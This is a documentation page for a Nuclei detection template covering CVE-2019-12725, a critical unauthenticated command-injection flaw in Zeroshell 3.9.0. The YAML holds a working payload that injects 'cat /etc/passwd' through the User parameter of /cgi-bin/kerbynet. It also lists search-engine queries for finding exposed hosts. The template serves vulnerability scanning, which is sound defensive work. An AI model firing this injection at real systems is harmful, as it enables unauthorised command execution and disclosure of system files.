Skip to content
Nuclei Templates

Zeroshell 3.9.0 - Remote Command Execution

ID: CVE-2019-12725

Severity: critical

Author: dwisiswant0,akincibor

Tags: cve,cve2019,packetstorm,rce,zeroshell

Description

Section titled “Description”

Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.

YAML Source

Section titled “YAML Source”
id: CVE-2019-12725


info:
  name: Zeroshell 3.9.0 - Remote Command Execution
  author: dwisiswant0,akincibor
  severity: critical
  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
  reference:
    - https://www.zeroshell.org/new-release-and-critical-vulnerability/
    - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
    - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
    - https://zeroshell.org/blog/
    - http://packetstormsecurity.com/files/160211/ZeroShell-3.9.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-12725
    cwe-id: CWE-78
    epss-score: 0.96341
    epss-percentile: 0.99549
    cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeroshell
    product: zeroshell
    shodan-query: http.title:"zeroshell"
    fofa-query: title="zeroshell"
    google-query: intitle:"zeroshell"
  tags: cve,cve2019,packetstorm,rce,zeroshell


http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 490a0046304402205e6f4486473763f2c50192afafc162f46126f2ee6ad3444aa3c76e563e9519e9022012e47f2580bafaf12640e7929dcbcb20589e1e1120b4a8ea4598d168070d5535:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-12725.yaml"

View on Github